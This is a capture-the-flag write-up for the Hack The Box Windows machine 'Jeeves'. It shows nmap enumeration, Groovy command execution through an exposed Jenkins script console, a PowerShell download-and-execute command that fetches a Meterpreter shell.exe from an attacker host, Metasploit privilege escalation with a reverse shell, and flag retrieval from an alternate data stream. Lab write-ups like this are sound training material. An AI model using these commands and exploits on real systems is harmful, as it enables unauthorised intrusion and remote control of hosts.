Jeeves
OS: Windows, Difficulty: Medium, IP: 10.10.10.63
Initial Enumeration
# Nmap 7.70 scan initiated Mon Jul 22 01:27:35 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 80,135,445,50000 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|10 (88%), FreeBSD 6.X (85%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10 cpe:/o:freebsd:freebsd:6.2
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%), Microsoft Windows 10 1511 - 1607 (85%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4h53m14s, deviation: 0s, median: 4h53m14s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-07-22 06:21:13
|_ start_date: 2019-07-22 06:08:01
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 234.36 ms 10.10.14.1
2 411.09 ms 10.10.10.63
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 22 01:28:34 2019 -- 1 IP address (1 host up) scanned in 59.36 secondsSMB ports, guest account disabled, anonymous login disabled. No luck. Gobuster for port 80, nothing, however for port 50000 there was something interesting.
/askjeeves (Status: 302)http://10.10.10.63:50000/askjeeves/computer/(master)/scriptHowever I upgrade the commands to the following to have better output
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c $COMMAND_GOES_HERE'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"echo $webclient = New-Object System.Net.WebClient >>wget.ps1 & echo $url = \"http://10.10.14.13/shell.exe\" >>wget.ps1 & echo $file = \"shell.exe\" >>wget.ps1 & echo $webclient.DownloadFile($url,$file) >>wget.ps1 & powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 & exploit.exeExecuted the command above to get a wget.ps1 file that downloads my meterpreter shell into the system and executes it, this got me user shell on MSF Console.
User Own
C:\Users\kohsuke\Desktop>type user.txt
type user.txt
e3232***Root Own
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.63 - Collecting local exploits for x64/windows...
[*] 10.10.10.63 - 11 exploit checks are being tried...
[+] 10.10.10.63 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.63 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > run
[*] Started reverse TCP handler on 10.10.14.13:4444
[*] Launching notepad to host the exploit...
[+] Process 3760 launched.
[*] Reflectively injecting the exploit DLL into 3760...
[*] Injecting exploit into 3760...
[*] Exploit injected. Injecting exploit configuration into 3760...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.63
[*] Meterpreter session 3 opened (10.10.14.13:4444 -> 10.10.10.63:49686) at 2019-07-22 19:49:54 +0530
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM Got system shell, however there was no root.txt file in the Administrator/Desktop folder, as there is supposed to be however there was a text stating the following.
C:\Users\Administrator\Desktop>type hm.txt
type hm.txt
The flag is elsewhere. Look deeper.After investing 3-4 Hours figuring out, the following thing worked.
C:\Users\Administrator\Desktop>dir /R
dir /R
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of C:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
11/03/2017 10:03 PM 282 desktop.ini
12/24/2017 03:51 AM 36 hm.txt
34 hm.txt:root.txt:$DATA
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
3 File(s) 1,115 bytes
2 Dir(s) 7,477,682,176 bytes free
C:\Users\Administrator\Desktop>type hm.txt:root.txt:$DATA
type hm.txt:root.txt:$DATA
The filename, directory name, or volume label syntax is incorrect.
C:\Users\Administrator\Desktop>type hm.txt:root.txt
type hm.txt:root.txt
The filename, directory name, or volume label syntax is incorrect.
C:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt
afbc5***Learning Outcome
Always enumerate for alternate data sources of files as well as for hidden files.
Last updated
